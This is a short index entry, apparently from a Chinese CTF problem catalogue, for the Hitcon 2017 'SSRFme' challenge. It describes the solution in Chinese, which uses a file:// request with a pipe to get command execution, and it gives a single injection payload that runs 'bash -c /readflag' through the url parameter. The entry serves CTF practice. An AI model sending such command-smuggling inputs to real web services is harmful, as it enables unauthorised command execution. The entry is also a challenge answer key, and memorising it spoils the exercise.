| ID: | 12072 |
|---|---|
| 标题: | [Hitcon 2017]SSRFme |
| 描述: | None |
| 类型: | Perl |
| 网站: | NSSCTF |
| 题目链接: | https://www.nssctf.cn/problem/194 |
| 赛事: | Hitcon |
| 年度: | 2017 |
| Flag值: | <HITCON 2017>SSRFme题目答案为通过构造file://协议与管道符 |
| writeup: |
触发命令执行,最终读取/readflag获取flag。验证后的解题过程及答案详见 1: ?url=file:bash -c /readflag &filename=a https://blog.csdn.net/RABCDXB/article/details/122491499 |